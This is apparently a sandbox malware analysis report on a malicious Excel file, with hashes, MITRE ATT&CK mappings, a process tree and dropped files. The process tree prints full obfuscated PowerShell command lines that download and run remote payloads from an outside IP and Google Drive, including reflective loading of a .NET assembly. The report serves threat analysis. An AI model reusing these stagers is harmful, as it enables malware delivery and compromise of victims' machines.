c9b46bf282df72278be6af59bb7acb43f5b6405d2567008d6fd56ed440e42377

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28-10-2024 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Document.xls
Size

1.0MB
MD5

1c220dca89b554c1365291ead95bfa31
SHA1

98234f8ae71502f109890e1f67a850fda1a2673a
SHA256

c9b46bf282df72278be6af59bb7acb43f5b6405d2567008d6fd56ed440e42377
SHA512

a4979842684119c4c703744bc074ff8abff61bb1ffb514d331f6c319fefe6c9c0ddff0ede403ec88f3756c5dbf2588c1b73e2c4f29280f68ab2cf8fd16e0cc18
SSDEEP

24576:lhfgpB31HbARM8UbCE4ypOkgNAvRioX4:lxMV18Ibrj9B

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2860	mshta.exe
11	2860	mshta.exe
13	2628	poWErshElL.exe
15	2080	powershell.exe
17	2080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1632	powershell.exe
2080	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2628	poWErshElL.exe
2916	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
14	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	poWErshElL.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWErshElL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2012	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2628	poWErshElL.exe
2916	powershell.exe
2628	poWErshElL.exe
2628	poWErshElL.exe
1632	powershell.exe
2080	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2628	poWErshElL.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2012	EXCEL.EXE
2012	EXCEL.EXE
2012	EXCEL.EXE
2012	EXCEL.EXE
2012	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2860 wrote to memory of 2628	2860	mshta.exe	32
PID 2860 wrote to memory of 2628	2860	mshta.exe	32
PID 2860 wrote to memory of 2628	2860	mshta.exe	32
PID 2860 wrote to memory of 2628	2860	mshta.exe	32
PID 2628 wrote to memory of 2916	2628	poWErshElL.exe	35
PID 2628 wrote to memory of 2916	2628	poWErshElL.exe	35
PID 2628 wrote to memory of 2916	2628	poWErshElL.exe	35
PID 2628 wrote to memory of 2916	2628	poWErshElL.exe	35
PID 2628 wrote to memory of 1136	2628	poWErshElL.exe	36
PID 2628 wrote to memory of 1136	2628	poWErshElL.exe	36
PID 2628 wrote to memory of 1136	2628	poWErshElL.exe	36
PID 2628 wrote to memory of 1136	2628	poWErshElL.exe	36
PID 1136 wrote to memory of 1952	1136	csc.exe	37
PID 1136 wrote to memory of 1952	1136	csc.exe	37
PID 1136 wrote to memory of 1952	1136	csc.exe	37
PID 1136 wrote to memory of 1952	1136	csc.exe	37
PID 2628 wrote to memory of 552	2628	poWErshElL.exe	39
PID 2628 wrote to memory of 552	2628	poWErshElL.exe	39
PID 2628 wrote to memory of 552	2628	poWErshElL.exe	39
PID 2628 wrote to memory of 552	2628	poWErshElL.exe	39
PID 552 wrote to memory of 1632	552	WScript.exe	40
PID 552 wrote to memory of 1632	552	WScript.exe	40
PID 552 wrote to memory of 1632	552	WScript.exe	40
PID 552 wrote to memory of 1632	552	WScript.exe	40
PID 1632 wrote to memory of 2080	1632	powershell.exe	42
PID 1632 wrote to memory of 2080	1632	powershell.exe	42
PID 1632 wrote to memory of 2080	1632	powershell.exe	42
PID 1632 wrote to memory of 2080	1632	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Document.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2012

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2860
- C:\Windows\SysWOW64\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe
  "C:\Windows\sYstEm32\WINDOWSPOWERsheLL\V1.0\poWErshElL.exe" "poWersheLL.exe -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE ; iEx($(IEX('[sYsteM.TeXt.EnCodInG]'+[cHAr]58+[char]0x3A+'utf8.geTSTring([SySTEM.CoNvert]'+[chaR]0X3a+[CHAR]0X3a+'FrombaSE64sTRING('+[CHAR]34+'JDNQWGFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFUmRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhEdXd3YU1ILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicHBCayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmFtV2pmLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUpISGlCdkpzc1gsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIndPY1JwcWtrWW8iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkM1BYYU86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly83OS4xNDEuMTY0LjIxNC80NDUvZ3JlZW50aGluZ3N0b2JlZ3JlYXR0aGluZ3Nmb3JlbnRpcmVwdXJwb3NlZm9yZ3JlYXQudElGIiwiJGVuVjpBUFBEQVRBXGdyZWVudGhpbmdzdG9iZWdyZWF0dGhpbmdzZm9yZW50aXJlcHVycG9zZS52YlMiLDAsMCk7c3RBUnQtc0xlZXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVlbnRoaW5nc3RvYmVncmVhdHRoaW5nc2ZvcmVudGlyZXB1cnBvc2UudmJTIg=='+[cHaR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop -W 1 -C DEvICecreDENTIalDEpLoYMEnT.eXE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qkavihlx.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1136
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFDE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCFDD.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greenthingstobegreatthingsforentirepurpose.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnS0NCaW0nKydhZ2VVcmwgPSBITjVodHRwczovJysnL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0JysnPScrJ2Rvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHMnKydVT3libkgtc0R2VWhCWXd1JysnciBITjU7S0MnKydCd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uJysnTmV0LldlYkNsaWVudDtLQ0JpbWFnZUJ5dGVzID0gS0NCd2ViQ2xpZW50LkRvd25sJysnb2FkRGF0YShLQ0JpbWFnZVVyJysnbCk7S0NCaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoS0NCaW1hZ2VCeXRlcyk7S0NCc3RhcnRGbGFnID0gSE41JysnPDxCQVNFNjRfU1RBUlQ+PkhONTtLQ0JlbmRGbGFnID0gSE41PDxCJysnQVNFNjRfRU5EPj5ITjU7S0NCc3RhcnRJbmRleCA9IEtDQmltYWdlVGV4dC5JbmRleE9mKEtDQnN0YXJ0RmxhZyk7S0NCZW5kSW5kZXggPSBLQ0JpbScrJ2FnZVRleHQuSW5kZXhPZihLQ0JlbmRGbGFnKTtLQ0JzdGFydEluZGV4IC1nZSAwIC1hbmQgJysnS0NCZW5kSW5kZXggLWd0IEtDQnN0YXJ0SW5kZXg7S0NCc3RhcnRJbmRleCArPSBLQ0JzdGFydEZsYWcuTGVuZ3RoO0snKydDQicrJ2Jhc2U2NExlbmd0aCA9IEtDQmVuZEluZGV4IC0gS0NCc3RhcnRJbmRleDtLQ0JiYXNlNjRDb21tYW5kJysnID0gS0NCaW1hZ2VUZXh0LlN1YnN0cmluZyhLQ0JzdGFydEluZGV4LCBLQ0JiYXNlNjRMZW5ndGgpO0tDQmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKEtDQmJhc2U2NENvbW1hbmQuVG8nKydDaGFyQXJyYXkoKSBPcHogRm9yRWFjaCcrJy1PYmplY3QgeyBLQ0JfICcrJ30pWy0xLi4tKEtDQmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07S0NCY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnInKydvbUJhc2U2NFN0cmluZyhLQ0JiYXNlNjRSZXZlJysncnNlZCk7SycrJ0NCbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEtDQmNvJysnbW1hbmRCeXRlcyk7S0NCdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChITjVWQUlITjUpO0tDQnZhaU1ldGhvZC5JbnZva2UoS0NCbnVsbCwgQChITjV0eHQuUkZGUlNSUy81NDQvJysnNDEyLjQ2MS4xNDEuOTcvLzpwdHRoSE41LCBITjVkZXMnKydhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVkZXNhdGl2YWRvSE41LCBITjVhc3BuZXRfcmVnYnJvd3NlcnMnKydITjUsIEhONWRlc2F0JysnaXZhZG9ITjUsIEhONWQnKydlc2F0aXZhZG9ITjUsSE4nKyc1ZGVzYXRpdmFkb0hONSxITjVkZXNhdGl2YScrJ2RvSE41LEhOJysnNWQnKydlc2F0aXZhZG8nKydITjUnKycsSE41ZGVzYXRpdmFkb0hONSxITjVkZScrJ3NhdGknKyd2YWRvSE41LEhONTFITjUsSE41ZGVzYXRpdmFkb0hONSkpJysnOycpIC1jckVwbEFjRShbQ0hhUl03MitbQ0hhUl03OCtbQ0hhUl01MyksW0NIYVJdMzkgIC1SRXBMYWNlICAnT3B6JyxbQ0hhUl0xMjQgIC1SRXBMYWNlICAoW0NIYVJdNzUrW0NIYVJdNjcrW0NIYVJdNjYpLFtDSGFSXTM2KXwgJiggJFBzaE9tZVsyMV0rJFBzSG9tRVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('KCBim'+'ageUrl = HN5https:/'+'/drive.google.com/uc?export'+'='+'download&id=1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwu'+'r HN5;KC'+'BwebClient = New-Object System.'+'Net.WebClient;KCBimageBytes = KCBwebClient.Downl'+'oadData(KCBimageUr'+'l);KCBimageText = [System.Text.Encoding]::UTF8.GetString(KCBimageBytes);KCBstartFlag = HN5'+'<<BASE64_START>>HN5;KCBendFlag = HN5<<B'+'ASE64_END>>HN5;KCBstartIndex = KCBimageText.IndexOf(KCBstartFlag);KCBendIndex = KCBim'+'ageText.IndexOf(KCBendFlag);KCBstartIndex -ge 0 -and '+'KCBendIndex -gt KCBstartIndex;KCBstartIndex += KCBstartFlag.Length;K'+'CB'+'base64Length = KCBendIndex - KCBstartIndex;KCBbase64Command'+' = KCBimageText.Substring(KCBstartIndex, KCBbase64Length);KCBbase64Reversed = -join (KCBbase64Command.To'+'CharArray() Opz ForEach'+'-Object { KCB_ '+'})[-1..-(KCBbase64Command.Length)];KCBcommandBytes = [System.Convert]::Fr'+'omBase64String(KCBbase64Reve'+'rsed);K'+'CBloadedAssembly = [System.Reflection.Assembly]::Load(KCBco'+'mmandBytes);KCBvaiMethod = [dnlib.IO.Home].GetMethod(HN5VAIHN5);KCBvaiMethod.Invoke(KCBnull, @(HN5txt.RFFRSRS/544/'+'412.461.141.97//:ptthHN5, HN5des'+'ativadoHN5, HN5desativadoHN5, HN5desativadoHN5, HN5aspnet_regbrowsers'+'HN5, HN5desat'+'ivadoHN5, HN5d'+'esativadoHN5,HN'+'5desativadoHN5,HN5desativa'+'doHN5,HN'+'5d'+'esativado'+'HN5'+',HN5desativadoHN5,HN5de'+'sati'+'vadoHN5,HN51HN5,HN5desativadoHN5))'+';') -crEplAcE([CHaR]72+[CHaR]78+[CHaR]53),[CHaR]39 -REpLace 'Opz',[CHaR]124 -REpLace ([CHaR]75+[CHaR]67+[CHaR]66),[CHaR]36)| &( $PshOme[21]+$PsHomE[34]+'x')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
0149217821afd8d56894a70e9a2e3baf

SHA1
bfef4585bc683c9800238a6a62b0acb7cc9c7086

SHA256
8fd0c368eb06c5aaffcf846f44e3ba0aa8f0e6c67479f22fdf23a0aff869e4f5

SHA512
998ae018474ecac449f575ff9348d5b0feee1aec746c67cf9e1daef8b12325b21d40fbda7d410a09480c50747e1d82e506fc754fdab4cf44dac5e1d10bf8da05

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
47563448400107c3b162ca1b56ff196f

SHA1
1687bb58d2b558f5fcb5b437a30130d0e894f480

SHA256
e390c35e693f6e24d85ade9ef85615068f7729883970d4c784e710450a9fbc73

SHA512
daedef1056c128de594eb262d3485f4d33481632af86e925cac61f8a207ec929ceefdf50bd55b97b9bc44f458e0c1d437a53885e9cfcdc6e8478ff3d07fef472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greatevenevermadeforrgreatthignstogetinbacketothegreat[1].hta

Filesize
8KB

MD5
a34b2a1b452bdb5462c4cc90ed729265

SHA1
705334d5802da44212e5643ac917450a19fe0c55

SHA256
c4a5639f22771ffaba48f935d5d0a87463603ca591ba54647aef5bbf9ecc0c3e

SHA512
3889580076da8d94fb9e9206a28a0f803fd085b010f23895a631f305c1d11599b9230a831008173bdccac31b5875e4fea1e041fb0a86ee0bf365da000fffa9e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC246.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCFDE.tmp

Filesize
1KB

MD5
0474f5113c25411928e9e937625e64f6

SHA1
b0212c44f5786a28a56daa7e611b3431bf025fb1

SHA256
12155db123d15183d3e622814c6fa767468a2bcef4073a71af53bf07058c0142

SHA512
bfb2f33f9117c6da8ba1059d37cbad3e5d3342ccba95c0cb816287ed8472cd39d27867f7441393811b797d39809ae6569acdc915f4e90980f0f9960343583a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\qkavihlx.dll

Filesize
3KB

MD5
00a8e3d8055d29f7a3c5045a00e9cb7a

SHA1
0a5f4a2c26035622c9543d59b4818366d825d96a

SHA256
ef27fa06f07dd12d185d09353fbe468ef71965d6fe45f696b709fef9f5e09acc

SHA512
9e309cb92b4d2e5c93c42eeb6372c85f6b775d44a2967af6f561d17302fe7c58fbc2db662ed5363b205a042977a03269f0a845eb6b2e0abcee6b97dad048b7b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\qkavihlx.pdb

Filesize
7KB

MD5
a1892d897bb7f08d786b7b92bee2ea97

SHA1
d010f3cc26ab1072735a2689146b46e853939572

SHA256
57cad1eb41c0748483e7dd79dc696bb7a43a0f61f120c7fa19b59f434dc84486

SHA512
c20d15f98664b131d64b786d6872f8ada459544a2d15cd4858c39361f58b7a4b1d629fe61cdb9a98e9fbef1bc052f0a56bc843fc9277ae19150ce096ebfdb391

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c0d7055de24c5b22b9ab34b938d6b2b3

SHA1
7612df9328d3051b6e9d0f2ed6712e2fa9e14f58

SHA256
bf6e2859d59327290d9dd84d895eb6b304d33e2d035451b4a0a277e0af57bf03

SHA512
6b409e52fb0330b98fe719db72d58f219b9f31bb247841e426f9ce71ad3ff1b359ddeb4df01c518edc0b81e232fdf899b7aa77bb7ef5b14791c5d2423495824e

Download Submit
C:\Users\Admin\AppData\Roaming\greenthingstobegreatthingsforentirepurpose.vbS

Filesize
137KB

MD5
2aa5b4a9613f66275a8813688d89b143

SHA1
5298dce042df152dcf126dbdbf987549dd8d49c8

SHA256
0fd97f432c3ad570e73d18bcacdf7fabf151ca1f96b72da7f30921f2c3e98df4

SHA512
1769a546d97b4cf572378dd8473ac9cedbc96cbb03a6c4dc4d7edf376430fa887e384ef60da77a8f0ff9c0c433ac445acb7f6b963009c2801eb8a3c4df69e6e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCFDD.tmp

Filesize
652B

MD5
bd10238280b6686f4fc6fdc51a1a3c55

SHA1
bba2393032818e616bafe0f67760d0ee7bc3a85c

SHA256
cc3ff207ac06fae4592eee87b49a654bdb219f0012fa169c599f979ff1199dc0

SHA512
009891c37b624e221e1a5b37b8c261c6c7442e96557789290178fd4d0ab85557dc3719c90b9ab08c93dd1212012ea896ca050628254dfa3ad417341f6d685936

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qkavihlx.0.cs

Filesize
468B

MD5
0f7f0249df5e809b57ba67ada7205248

SHA1
cfe8697900ca60bedef3185a1220f102feac901b

SHA256
5e35059c497df270a251877e527d0ac3d9a5d1c3e4c779cb407a85ae5ee643e2

SHA512
5b4fc02976ba89fbd8ba05fb016bd79694e123d1498ae1a783c7831e33c39dbff81a5302db10f45f160ec73b3a4d82ad0dc869626ab49f5f0d95c3d5c4fbee38

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qkavihlx.cmdline

Filesize
309B

MD5
d05e7baad3972134ef0e8106c7253893

SHA1
075da2debb15fe48c4f8c427635eecc90ec0dd65

SHA256
ab1a696f96b157de2e5b03753223b316a3d18d92671221eea2af7803182e746b

SHA512
b9edc7b08b28c32b15663b9b5b7ddf7301e4ceeb6c84778f98f3ac64e68dfe62e6d3c1a90e94a4df2e07244ba9da567735de4fe084170ec0473ac19039a1d981

Download Submit
memory/2012-1-0x000000007237D000-0x0000000072388000-memory.dmp

Filesize
44KB

Download
memory/2012-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2012-69-0x000000007237D000-0x0000000072388000-memory.dmp

Filesize
44KB

Download
memory/2012-17-0x0000000002540000-0x0000000002542000-memory.dmp

Filesize
8KB

Download
memory/2860-16-0x00000000003E0000-0x00000000003E2000-memory.dmp

Filesize
8KB

Download